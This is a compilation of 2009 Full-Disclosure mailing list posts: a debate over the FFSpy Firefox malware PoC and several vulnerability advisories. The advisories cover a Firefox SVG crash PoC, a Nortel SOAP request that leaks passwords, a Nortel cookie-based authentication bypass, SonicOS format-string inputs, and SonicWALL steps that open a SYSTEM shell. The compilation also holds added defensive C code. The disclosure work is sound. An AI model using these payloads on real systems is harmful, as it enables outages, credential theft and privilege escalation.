Re: [Full-disclosure] FFSpy, a firefox malware PoC
On Wed, May 20, 2009 at 6:12 AM, saphex <sap...@gmail.com> wrote:
> I think this is interesting, http://myf00.net/?p=18

I fail to understand what is new or interesting in this POC.

If a person with malicious intent gains so much access to a system that he can put his files or Firefox plugins there, modify existing files, etc., then he can do anything he wants anyway. This is nothing new. It has always been well known that Firefox plugins can also be made to do malicious things such as steal passwords, sniff data before it gets encrypted in SSL, etc. Absolutely nothing new.

The same holds true for a user downloading malicious software on his own and running it on his system. It is true that most users don't verify the source code before running it. But this is not anything specific to Firefox. This holds true for any open source or closed source software users download. So, again, FFSpy sniffing data is nothing new.

From the POC it seems that somehow the attacker has to gain physical access to the system or do some social engineering attack to fool the user into installing or modifying his existing plugins. The PoC does not explain how this is done.

This is like claiming, "I have found an interesting attack which involves modifying XYZ program or DLL or script on the system that would sniff data and send it to a remote server. I name it ComputerSPY." This is very lame. Of course if you have access to modify or create stuff in the system, you can do anything. Nothing new at all.

What is the point of the POC? What is the PoC trying to achieve? Is the POC trying to tell us something that we don't already know?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FFSpy, a firefox malware PoC
On the iPhone a new app came out called MobileSpy, designed to secretly record all activity on the iPhone. OMG, the iPhone now has spyware, etc. No, the user must:

1. Jailbreak his phone
2. Download and install the MobileSpy application.

Recently a person told me that stupidity is a capital crime. We see that evermore here. These days we are worried about drive-by downloads. Spyware in the form of Mozilla Firefox has been an issue for a while.

James

On Tue, May 26, 2009 at 9:28 AM, Shell Code <technobus...@gmail.com> wrote:
> On Wed, May 20, 2009 at 6:12 AM, saphex <sap...@gmail.com> wrote:
>> I think this is interesting, http://myf00.net/?p=18
>
> I fail to understand what is new or interesting in this POC.
>
> If a person with malicious intent gains so much access to a system that he can put his files or Firefox plugins there, modify existing files, etc., then he can do anything he wants anyway. This is nothing new. It has always been well known that Firefox plugins can also be made to do malicious things such as steal passwords, sniff data before it gets encrypted in SSL, etc. Absolutely nothing new.
>
> The same holds true for a user downloading malicious software on his own and running it on his system. It is true that most users don't verify the source code before running it. But this is not anything specific to Firefox. This holds true for any open source or closed source software users download. So, again, FFSpy sniffing data is nothing new.
>
> From the POC it seems that somehow the attacker has to gain physical access to the system or do some social engineering attack to fool the user into installing or modifying his existing plugins. The PoC does not explain how this is done.
>
> This is like claiming, "I have found an interesting attack which involves modifying XYZ program or DLL or script on the system that would sniff data and send it to a remote server. I name it ComputerSPY." This is very lame. Of course if you have access to modify or create stuff in the system, you can do anything. Nothing new at all.
>
> What is the point of the POC? What is the PoC trying to achieve? Is the POC trying to tell us something that we don't already know?

--
http://www.goldwatches.com
http://www.jewelerslounge.com
[Full-disclosure] [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)
From the low-hanging-fruit department:
Firefox et al. Denial of Service - All versions supporting SVG

CHEAP Plug: You are invited to participate in HACK.LU 2009, a small but concentrated Luxembourgish security conference. More information: http://www.hack.lu
CFP is open, sponsorship is still possible and warmly welcomed!

Release mode: Forced release.
Ref: [TZO-26-2009] - Firefox DoS (unclamped loop) SVG
WWW: http://blog.zoller.lu/2009/04/advisory-firefox-dos-condition.html
Vendor: http://www.firefox.com
Status: No patch
CVE: none provided
Credit: none
Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=465615
Security notification reaction rating: There wasn't any reaction. OSS Security notification FTW
Notification to patch window: x+n
Disclosure Policy: http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products:
- Firefox, all versions supporting SVG (didn't care to investigate which, task of the vendor)
- all software packages using the Mozilla engine and allowing SVG

I. Background
~~~~~~~~~~~~~
Firefox is a popular internet browser.

II. Description
~~~~~~~~~~~~~~~
This bug is a typical result of what we call an unclamped loop. An attacker gives the radius value of the circle element (the r attribute) a very big value. That is leetness.

Stack trace:
ntkrnlpa.exe+0x6e9ab
ntkrnlpa.exe!MmIsDriverVerifying+0xbb0
hal.dll+0x2ef2
xul.dll!NS_InvokeByIndex_P+0x30c36
xul.dll!NS_InvokeByIndex_P+0x30e8a
xul.dll!NS_InvokeByIndex_P+0x30e02
xul.dll!NS_InvokeByIndex_P+0x30f5e
xul.dll!XRE_InitEmbedding+0x7858
xul.dll!XRE_InitEmbedding+0xf4ee
xul.dll!XRE_TermEmbedding+0x11411
xul.dll!gfxTextRun::Draw+0xdd4d
xul.dll!gfxTextRun::Draw+0xe1ca
xul.dll!gfxWindowsPlatform::PrefChangedCallback+0x1495
xul.dll!gfxTextRun::SetSpaceGlyph+0x2678
xul.dll!gfxFont::NotifyLineBreaksChanged+0xf1d3
xul.dll!gfxWindowsPlatform::RunLoader+0xa9f6
xul.dll!NS_StringCopy_P+0x9942
xul.dll!gfxImageSurface::gfxImageSurface+0x3188
xul.dll!gfxImageSurface::gfxImageSurface+0x2ed8

Also produces exceptions in MOZCRT19...
MOZCRT19!modf+0x2570:
600715e0 660f122550450960 movlpd xmm4,qword ptr [MOZCRT19!exception::`vftable'+0x1a3d8 (60094550)] ds:0023:60094550=3fe62e42fefa39ef

III. Impact
~~~~~~~~~~~
The browser no longer responds to any user input, all tabs are no longer accessible, and your work, if any (hail to the web 2.0), might be lost.

IV. Proof of concept (hold your breath)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html xmlns='http://www.w3.org/1999/xhtml'>
<head></head>
<body>
<svg xmlns='http://www.w3.org/2000/svg'><circle cx='10' cy='10' r='1.79769313486231E+308' fill='red' /></svg>
</body></html>

V. Disclosure timeline
~~~~~~~~~~~~~~~~~~~~~~
DD/MM/YYYY
18/11/2008: Created bugzilla entry (security) with proof of concept, description, the terms under which I cooperate and the planned disclosure date.
24/22/2008: Daniel Veditz comments: "Might be a cairo bug rather than SVG (seems to be looping in libthebes), but I can definitely confirm the DoS."
14/12/2008: Asked for any action plan and gave my assessment of considering it low risk. No reply.
28/12/2008: Timeless comments: "[..] personally, i intend to open this bug to the public [..] a bug like this is more likely to be fixed by being visible to more people than by leaving it in a closet."
26/05/2009: In 2009 I agree; release of this advisory.
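The "unclamped loop" the advisory names is an input-validation failure: the renderer takes the circle's r attribute, here a value just under DBL_MAX, straight into its rasterisation loop. The C program below is an added example, not part of the advisory and not Mozilla or cairo code. It parses the r attribute out of a constructed copy of the PoC markup, rejects non-numeric, non-finite or negative values, clamps absurdly large finite ones to an assumed bound (MAX_RADIUS_PX, a constant chosen for illustration), and shows how clipping the scanline range to the viewport before it becomes a loop bound keeps the iteration count finite regardless of what r says. The function names are assumptions.

```c
#include <errno.h>
#include <float.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed sane upper bound for a radius in device pixels; a real renderer
   would derive this from the surface size. */
#define MAX_RADIUS_PX 1.0e6

/* Constructed copy of the advisory's PoC circle, used as sample input. */
static const char POC_SVG[] =
    "<svg xmlns='http://www.w3.org/2000/svg'>"
    "<circle cx='10' cy='10' r='1.79769313486231E+308' fill='red' />"
    "</svg>";

typedef enum { RADIUS_OK, RADIUS_REJECTED, RADIUS_CLAMPED } radius_status;

/* Copy the value of a single-quoted attribute (e.g. r='...') into out.
   Returns 1 on success, 0 if the attribute is missing or too long. */
static int extract_attr(const char *markup, const char *name,
                        char *out, size_t cap)
{
    char pattern[32];
    snprintf(pattern, sizeof pattern, " %s='", name);
    const char *start = strstr(markup, pattern);
    if (!start) return 0;
    start += strlen(pattern);
    const char *end = strchr(start, '\'');
    if (!end || (size_t)(end - start) >= cap) return 0;
    memcpy(out, start, (size_t)(end - start));
    out[end - start] = '\0';
    return 1;
}

/* Parse a radius: reject garbage, overflow, NaN, infinities and negatives;
   clamp huge but finite values (the PoC's ~DBL_MAX) to MAX_RADIUS_PX. */
static radius_status parse_radius(const char *text, double *r_out)
{
    char *end;
    errno = 0;
    double v = strtod(text, &end);
    if (end == text || *end != '\0') return RADIUS_REJECTED;      /* not a number */
    if (errno == ERANGE) return RADIUS_REJECTED;                   /* out of range */
    if (v != v || v > DBL_MAX || v < 0.0) return RADIUS_REJECTED;  /* NaN/inf/negative */
    if (v > MAX_RADIUS_PX) { *r_out = MAX_RADIUS_PX; return RADIUS_CLAMPED; }
    *r_out = v;
    return RADIUS_OK;
}

/* Scanlines a circle centred at cy with radius r touches in a viewport of
   `rows` rows. The range is clipped to the viewport *before* it becomes a
   loop bound, so the count never exceeds `rows`, however large r is. */
static long scanlines_to_rasterise(double cy, double r, long rows)
{
    double lo = cy - r, hi = cy + r;
    if (lo < 0.0) lo = 0.0;
    if (hi > (double)(rows - 1)) hi = (double)(rows - 1);
    if (hi < lo) return 0;
    long first = (long)lo;              /* ceil() for non-negative lo */
    if ((double)first < lo) first++;
    long last = (long)hi;               /* floor() for non-negative hi */
    return last >= first ? last - first + 1 : 0;
}

int main(void)
{
    char text[64];
    double r = 0.0;
    if (!extract_attr(POC_SVG, "r", text, sizeof text)) return 1;
    radius_status st = parse_radius(text, &r);
    printf("r attribute %s -> status %d, effective radius %g\n", text, st, r);
    printf("scanlines in a 600-row viewport: %ld\n",
           scanlines_to_rasterise(10.0, r, 600));
    return 0;
}
```

The two defences are independent: parse_radius stops the absurd value at the attribute boundary, and scanlines_to_rasterise shows that even a value which slips through should only ever drive a loop whose bound comes from the output surface, not from the input.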
Re: [Full-disclosure] [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)
Hi Sub,

> does not work on firefox 3.0.10, tested

Reproduced the bug on 3.0.10 prior to posting.

--
http://blog.zoller.lu
Thierry Zoller
Re: [Full-disclosure] FFSpy, a firefox malware PoC
On Tue, May 26, 2009 at 8:38 PM, Shell Code <technobus...@gmail.com> wrote:
> I would appreciate it if you post replies to the list instead of sending them only to me. My comments inline.
>
> On Tue, May 26, 2009 at 5:10 PM, saphex <sap...@gmail.com> wrote:
>>> I fail to understand what is new or interesting in this POC. If a person with malicious intent gains so much access to a system that he can put his files or firefox plugins, modify existing files, etc
>>
>> If you gain access to a system with a user that isn't administrator (at least under systems that enforce user *differentiation*, read any Linux flavour and Vista), you only have access to the user's folder, you can't install anything (especially under Linux). I guess this is meant to be an alternative way of getting the job done.
>
> This is not true. You can carry out attacks of the same severity by gaining access to a Linux or Windows system as a user that isn't the administrator. Here are a few examples:
>
> 1. Modify a vim, emacs, KDE, GNOME, etc. plugin that the user uses so that it sends the user's personal content (data, files, commands executed, etc.) from the system to a remote server.
>
> 2. Put a malicious executable file or script in the user's home directory and execute it from start-up scripts (.bashrc, .bash_profile, etc.) so that the malicious executable file executes whenever the user logs in. Now this malicious file can send the user's personal content to a remote server.
>
> 3. Modify or put plugins for other software to do malicious stuff. Similar to point 1.
>
> 4. Override PATH settings, aliases, put scripts, etc. so that 'ls' now executes 'rm' or some other malicious command, so that the user ends up executing commands he did not intend to.
>
> 5. ... and much more ...
>
>>> From the POC it seems that somehow the attacker has to gain physical access to the system or do some social engineering attack to fool the user into installing or modifying his existing plugins. The PoC does not explain how this is done.
>>
>> Do you know the download-and-execute payload for exploits? Make an application that changes the files, then use that payload in some exploit. People just want everything done. Just click, download, use, and call themselves l33ts.
>
> How is it any different from the attack scenarios I have explained in the case of vim, emacs, KDE, GNOME, Linux shell, etc.?
>
>> Maybe this is nothing new, but I think that the way to do it is new. Because you don't install anything, and the point to be proven here is that the Firefox add-on system is security flawed from the very beginning.
>
> So, are you saying vim, emacs and the plugin system of every other software on the earth is security flawed from the very beginning?

I believe saphex or the author of the so-called PoC, Duarte Silva, do not understand the concept of privileges and security vulnerabilities. By the way, are saphex and Duarte Silva two different persons, or saphex == Duarte Silva?

Coming back to the topic of privileges: any Firefox addon runs in the context of the user running the browser. So, the addon can do whatever the user running the browser can. The same holds true for plugins of other software too, as Shell Code has correctly explained. For example, an emacs plugin can do whatever the user running emacs can. So, if saphex or Duarte Silva argues that this is a security flaw in the Firefox addon mechanism, they will also argue that this is a security flaw in emacs, Windows, Eclipse and every other OS and software. Such an argument, without any doubt, is lame and stupid, as most people trained in computer security would agree.

--
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. - Albert Einstein
--
[Full-disclosure] SEC Consult SA-20090525-1 :: Nortel Contact Center Manager Server Password Disclosure Vulnerability
SEC Consult Security Advisory < 20090525-1 >
=======================================================================
              title: Nortel Contact Center Manager Server Password Disclosure
            program: Nortel Contact Center Manager Server
 vulnerable version: 6.0
           homepage: http://www.nortel.com/ccms
              found: 2008-11-14
                 by: David Matscheko / SEC Consult Vulnerability Lab
     permanent link: https://www.sec-consult.com/advisories_e.html#a57
=======================================================================

Vendor description:
-------------------

Contact Center Manager Server (CCMS) offers a scalable solution for dynamic contact center environments requiring sophistication and differentiation in the care offered to their customers. CCMS provides skill-based routing; call treatment flexibility, real time displays, multimedia routing, and comprehensive management and reporting functionality - empowering contact center managers with the tools and agility to deliver unique and unprecedented care to their customers. The rich scripting language supports multifaceted call routing and treatment decisions based on combinations of real time conditions.

[source: http://www.nortel.com/ccms]

Vulnerability overview:
-----------------------

The Nortel Contact Center Manager Server web application provides a SOAP interface. This interface does not require authorisation and responds to certain requests with sensitive information.

Vulnerability description:
--------------------------

The following SOAP request queries the user data for the user sysadmin:

---
POST /Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx HTTP/1.1
Host: 10.1.2.3
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://SoapWrapperCommon.CCMA.Applications.Nortel.com/SOAPWrapperCommon_UsersWS_GetServers_Wrapper"
Content-Length: 661

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SOAPWrapperCommon_UsersWS_GetServers_Wrapper xmlns="http://SoapWrapperCommon.CCMA.Applications.Nortel.com">
      <ccmaUserName>string</ccmaUserName>
      <clientIP>string</clientIP>
      <componentID>string</componentID>
      <sessionID>string</sessionID>
      <strUserID>string</strUserID>
      <strPassword>string</strPassword>
    </SOAPWrapperCommon_UsersWS_GetServers_Wrapper>
  </soap:Body>
</soap:Envelope>
---

The following is an excerpt of the response to the previous query. It contains the user sysadmin with the corresponding password (password, server IP address, and server name have been changed):

---
&lt;rs:data&gt;
  &lt;z:row ID='0' ServerName='abcd01' ServerIP='10.1.2.3' ServerDescription='abcd01' ServerUserID='sysadmin' ServerPassword='pwd4hugo' ServerType='1' SystemVersion='6.0' OpenQueue='0' HeteroNetworking='0' Network='0' ServerSWBuild='4.4F' ServerSULevel='CCMS_6.0_SU_05' ServerDPLevel='CCMS_6.0_SUS_0503' BasicIVR='1' GracePeriodState='3' RefreshIntervalsElapsed='0'/&gt;
&lt;/rs:data&gt;
---

Proof of concept:
-----------------

This vulnerability can be exploited with a web browser and plugins / web proxy.

Vulnerable versions:
--------------------

The version tested was 06.00.004.03 with the following updates applied:
CCMA_6.0_SU_05
CCMA_6.0_SUS_0501
CCMA_6.0_SUS_0502

Prior versions are most likely also vulnerable.

Vendor contact timeline:
------------------------

January 2009: Vendor informed about vulnerability
2009-05-14: Patch available
2009-05-25: Public Release

Patch:
------

The vendor has released a vulnerability fix which addresses the issue. In addition, the vendor has released a public security advisory containing update instructions.

URL: http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=905808

--
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF David Matscheko / @2009
[Full-disclosure] SEC Consult SA-20090525-4 :: SonicOS Format String Vulnerability
SEC Consult Security Advisory < 20090525-4 >
=======================================================================
              title: SonicOS Format String Vulnerability
            program: SonicWALL Global VPN Client
 vulnerable version: PRO 4100 SonicOS 4.0.0.2-51e Standard and Enhanced
                     possibly other versions
           homepage: http://www.sonicwall.com
              found: October 2006
                 by: lofi42
     permanent link: https://www.sec-consult.com/advisories_e.html#a54
=======================================================================

Product description:
--------------------

SonicOS Enhanced (SonicOSe) is the latest version of SonicWALL's powerful SonicOS operating system, designed for the next generation of SonicWALL firewall/VPN appliances.

Vulnerability overview:
-----------------------

A format string vulnerability exists in the logfile parsing function of SonicOS. An attacker could crash the system or execute arbitrary code by injecting format string metacharacters into the logfile, if an administrator subsequently uses the SonicOS GUI to view the log.

Proof of concept:
-----------------

There are multiple ways to inject format string characters into the logs. The following methods can be used to test for the vulnerability:

1. CFS: Add ebay.com to your Forbidden Domains and access http://www.ebay.com/%s%s%s%s%s%s/.
2. GroupVPN: Establish a GroupVPN tunnel and enter %s%s%s%s%s as the XAUTH username.
3. Web frontend: Enter %s %s%s%s%s as the username on the login page of your SonicWALL.

SEC Consult will not release code execution exploits for this vulnerability to the public.

Vendor contact timeline:
------------------------

2006: Vulnerability found
2006.10.25: Vulnerability first reported to vendor
2009.02.17: Vulnerability reported to vendor again
2009.03.16: Request for status update
2009.04.21: Request for status update
2009.05.25: Public Release

Patch:
------

SEC Consult was not able to get any vendor feedback on this issue. We are currently not aware of a patch or workaround.

--
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF SEC Consult Vulnerability Lab / @2009
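The defect class behind this advisory is the textbook one: a log line that an unauthenticated party can influence ends up as the format argument of a printf-style call instead of as data. The C program below is an added example, not SonicOS code and not from SEC Consult. It shows the vulnerable call beside the fixed one, and adds two defensive helpers a log viewer or ingest pipeline can use on its side: a counter for %-directives in a line (useful as a detection rule) and a renderer that doubles every '%' so the stored line stays inert if a downstream consumer ever misuses it as a format. The sample log lines are constructed to mirror the three test cases in the advisory; all function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Constructed log entries mirroring the advisory's test cases: a benign
   line, an XAUTH user name and a CFS-blocked URL carrying runs of %s. */
static const char *const SAMPLE_LOG[] = {
    "login failure user=admin src=10.1.2.3",
    "xauth user=%s%s%s%s%s src=10.1.2.4",
    "cfs blocked url=http://www.ebay.com/%s%s%s%s%s%s/",
};
#define SAMPLE_LOG_COUNT (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

/* VULNERABLE: the attacker-controlled line *is* the format string. Each %s
   pulls a pointer that was never passed, so the viewer dereferences stack
   garbage and crashes; the advisory notes this can reach code execution. */
static void show_entry_vulnerable(const char *line)
{
    printf(line);
    putchar('\n');
}

/* FIXED: a constant format; the line is passed purely as data. */
static void show_entry_fixed(const char *line)
{
    printf("%s\n", line);
}

/* Detection helper: count conversion directives in a line. A '%' followed
   by anything other than '%' counts; "%%" is a literal percent sign. */
static int count_format_directives(const char *line)
{
    int n = 0;
    for (const char *p = line; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        n++;
    }
    return n;
}

/* Hardening helper for ingest: copy the line, doubling every '%' so the
   result is inert even if a downstream consumer mistakenly uses it as a
   format. Returns the output length; the output is always NUL-terminated. */
static size_t render_entry_escaped(const char *line, char *out, size_t cap)
{
    size_t o = 0;
    if (cap == 0) return 0;
    for (const char *p = line; *p && o + 2 < cap; p++) {
        out[o++] = *p;
        if (*p == '%') out[o++] = '%';
    }
    out[o] = '\0';
    return o;
}

int main(void)
{
    char buf[128];
    for (size_t i = 0; i < SAMPLE_LOG_COUNT; i++) {
        int n = count_format_directives(SAMPLE_LOG[i]);
        printf("[%s] %d directive(s): ", n ? "SUSPECT" : "ok     ", n);
        show_entry_fixed(SAMPLE_LOG[i]);
        render_entry_escaped(SAMPLE_LOG[i], buf, sizeof buf);
        printf("    escaped: %s\n", buf);
    }
    /* Only the benign line goes through the vulnerable viewer; the hostile
       lines would crash it, which is exactly the advisory's point. */
    show_entry_vulnerable(SAMPLE_LOG[0]);
    return 0;
}
```

The count is a heuristic for alerting, not a sanitiser: the real fix is the constant format string in show_entry_fixed, and the escaping helper exists only to contain the damage in systems where the viewer cannot be patched.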
[Full-disclosure] [ GLSA 200905-08 ] NTP: Remote execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            Gentoo Linux Security Advisory                           GLSA 200905-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: NTP: Remote execution of arbitrary code
      Date: May 26, 2009
      Bugs: #263033, #268962
        ID: 200905-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple errors in the NTP client and server programs might allow for the remote execution of arbitrary code.

Background
==========

NTP contains the client and daemon implementations for the Network Time Protocol.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /               Unaffected
    -------------------------------------------------------------------
  1  net-misc/ntp                 < 4.2.4_p7                >= 4.2.4_p7

Description
===========

Multiple vulnerabilities have been found in the programs included in the NTP package:

* Apple Product Security reported a boundary error in the cookedprint() function in ntpq/ntpq.c, possibly leading to a stack-based buffer overflow (CVE-2009-0159).

* Chris Ries of CMU reported a boundary error within the crypto_recv() function in ntpd/ntp_crypto.c, possibly leading to a stack-based buffer overflow (CVE-2009-1252).

Impact
======

A remote attacker might send a specially crafted package to a machine running ntpd, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the daemon, or a Denial of Service. NOTE: Successful exploitation requires the autokey feature to be enabled. This feature is only available if NTP was built with the 'ssl' USE flag.

Furthermore, a remote attacker could entice a user into connecting to a malicious server using ntpq, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application, or a Denial of Service.

Workaround
==========

You can protect against CVE-2009-1252 by disabling the 'ssl' USE flag and recompiling NTP.

Resolution
==========

All NTP users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.4_p7"

References
==========

  [ 1 ] CVE-2009-0159
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0159
  [ 2 ] CVE-2009-1252
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1252

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200905-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[Full-disclosure] SEC Consult SA-20090525-3 :: SonicWALL Global VPN Client Local Privilege Escalation Vulnerability
SEC Consult Security Advisory < 20090525-3 >
=======================================================================
              title: SonicWALL Global VPN Client Local Privilege Escalation Vulnerability
            program: SonicWALL Global VPN Client
 vulnerable version: Global VPN Client <= 4.0.0.835
                     possibly other versions
           homepage: http://www.sonicwall.com
              found: October 2006
                 by: lofi42
     permanent link: https://www.sec-consult.com/advisories_e.html#a55
=======================================================================

Vendor description:
-------------------

The SonicWALL Global VPN Client offers an easy-to-use, easy-to-manage Virtual Private Network (VPN) solution that provides users at distributed locations with secure, reliable remote access via broadband, wireless and dial-up connections.

[source: http://www.sonicwall.com/downloads/Global_VPN_DS_US.pdf]

Vulnerability overview:
-----------------------

A local privilege escalation vulnerability exists in the SonicWALL Global VPN Client. By exploiting this vulnerability, a local attacker could execute code with LocalSystem privileges.

Vulnerability description:
--------------------------

During installation of the SonicWALL Global VPN Client, permissions for the installation folder %ProgramFiles%\SonicWALL\SonicWALL Global VPN Client are by default set to Everyone:Full Control without any warning. The service RampartSvc is started from this folder. Services are started under the LocalSystem account. There is no protection of the service files. It is possible for an unprivileged user to replace the service executable with a file of his choice to get full access with LocalSystem privileges.

Proof of concept:
-----------------

This vulnerability can be exploited without any special exploit code.

Vendor contact timeline:
------------------------

2006: Vulnerability found
2006.10.25: Vulnerability first reported to vendor
2009.02.17: Vulnerability reported to vendor again
2009.03.16: Request for status update
2009.04.21: Request for status update
2009.05.25: Public Release

Patch:
------

SEC Consult was not able to get any vendor feedback on this issue. We are currently not aware of a patch or workaround.

--
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF SEC Consult Vulnerability Lab / @2009
[Full-disclosure] SEC Consult SA-20090525-2 :: SonicWALL Global Security Client Local Privilege Escalation Vulnerability
SEC Consult Security Advisory < 20090525-2 >
=======================================================================
              title: SonicWALL Global Security Client Local Privilege Escalation Vulnerability
            program: SonicWALL Global Security Client
 vulnerable version: 1.0.0.15 and possibly other versions
           homepage: http://www.sonicwall.com
              found: October 2006
                 by: lofi42
     permanent link: https://www.sec-consult.com/advisories_e.html#a56
=======================================================================

Vendor description:
-------------------

The SonicWALL Global Security Client offers IT professionals the capability to manage a mobile user’s online access, based upon corporate policies, in order to ensure optimal security of the network and maximize network resources. Instant messaging, high-risk Web sites and network file access can all be allowed or disallowed as security and productivity concerns dictate.

[source: http://www.sonicwall.com/downloads/DS_GlobalSecurityClient_A4.pdf]

Vulnerability overview:
-----------------------

Local exploitation of a design error in SonicWALL's Global Security Client could allow attackers to obtain increased privileges.

Vulnerability description:
--------------------------

The problem specifically exists because SYSTEM privileges are not dropped when accessing the GSC properties from the System Tray applet. The vulnerability can be exploited by right-clicking the System Tray icon, choosing Log, right-clicking Event Viewer, then Open Log File. The file selection dialog that opens can be abused by navigating to C:\WINDOWS\SYSTEM32\, right-clicking cmd.exe, then selecting Open; doing so spawns a command shell with SYSTEM privileges.

Proof of concept:
-----------------

This vulnerability can be exploited without any special exploit code.

Vendor contact timeline:
------------------------

2006: Vulnerability found
2006.10.25: Vulnerability first reported to vendor
2009.02.17: Vulnerability reported to vendor again
2009.03.16: Request for status update
2009.04.21: Request for status update
2009.05.25: Public Release

Patch:
------

SEC Consult was not able to get any vendor feedback on this issue. We are currently not aware of a patch or workaround.

--
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF SEC Consult Vulnerability Lab / @2009
[Full-disclosure] SEC Consult SA-20090525-0 :: Nortel Contact Center Manager Server Authentication Bypass Vulnerability
SEC Consult Security Advisory < 20090525-0 >
=======================================================================
              title: Nortel Contact Center Manager Server Authentication Bypass
            program: Nortel Contact Center Manager Server
 vulnerable version: 6.0
           homepage: http://www.nortel.com/ccms
              found: 2008-11-14
                 by: Bernhard Mueller / SEC Consult Vulnerability Lab
     permanent link: https://www.sec-consult.com/advisories_e.html#a58
=======================================================================

Vendor description:
-------------------

Contact Center Manager Server (CCMS) offers a scalable solution for dynamic contact center environments requiring sophistication and differentiation in the care offered to their customers. CCMS provides skill-based routing; call treatment flexibility, real time displays, multimedia routing, and comprehensive management and reporting functionality - empowering contact center managers with the tools and agility to deliver unique and unprecedented care to their customers. The rich scripting language supports multifaceted call routing and treatment decisions based on combinations of real time conditions.

[source: http://www.nortel.com/ccms]

Vulnerability overview:
-----------------------

The Nortel Contact Center Manager Server web application relies on client-side cookies to check the roles of authenticated users. Authentication can be bypassed by manually setting the required cookies. By exploiting this vulnerability, an attacker can bypass authentication and access the Nortel Contact Center Manager Server.

Vulnerability description:
--------------------------

The following cookies have to be set to access all menu items:

LoginMsgSwitch=True
LoginMsgAccepted=True
Logged=True
isAdmin=True
LoginMsgSwitch=True
LoginMsgAccepted=True
IsConfig=1
IsUser=1
IsRTD=1
IsReport=1
IsScript=1
IsAudit=1
IsEmHelp=1
isOutbound=1
UserID=x
AuditSwitch=on
LoginMsgAccepted=True

Proof of concept:
-----------------

This vulnerability can be exploited with a web browser and plugins / web proxy.

Vulnerable versions:
--------------------

The version tested was 06.00.004.03 with the following updates applied:
CCMA_6.0_SU_05
CCMA_6.0_SUS_0501
CCMA_6.0_SUS_0502

Prior versions are most likely also vulnerable.

Vendor contact timeline:
------------------------

January 2009: Vendor informed about vulnerability
2009-05-14: Patch available
2009-05-25: Public Release

Patch:
------

The vendor has released a vulnerability fix which addresses the issue. In addition, the vendor has released a public security advisory containing update instructions.

URL: http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=905698

--
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2008
Re: [Full-disclosure] FFSpy, a firefox malware PoC
I would appreciate it if you post replies to the list instead of sending them only to me. My comments inline.

On Tue, May 26, 2009 at 5:10 PM, saphex <sap...@gmail.com> wrote:
>> I fail to understand what is new or interesting in this POC. If a person with malicious intent gains so much access to a system that he can put his files or firefox plugins, modify existing files, etc
>
> If you gain access to a system with a user that isn't administrator (at least under systems that enforce user *differentiation*, read any Linux flavour and Vista), you only have access to the user's folder, you can't install anything (especially under Linux). I guess this is meant to be an alternative way of getting the job done.

This is not true. You can carry out attacks of the same severity by gaining access to a Linux or Windows system as a user that isn't the administrator. Here are a few examples:

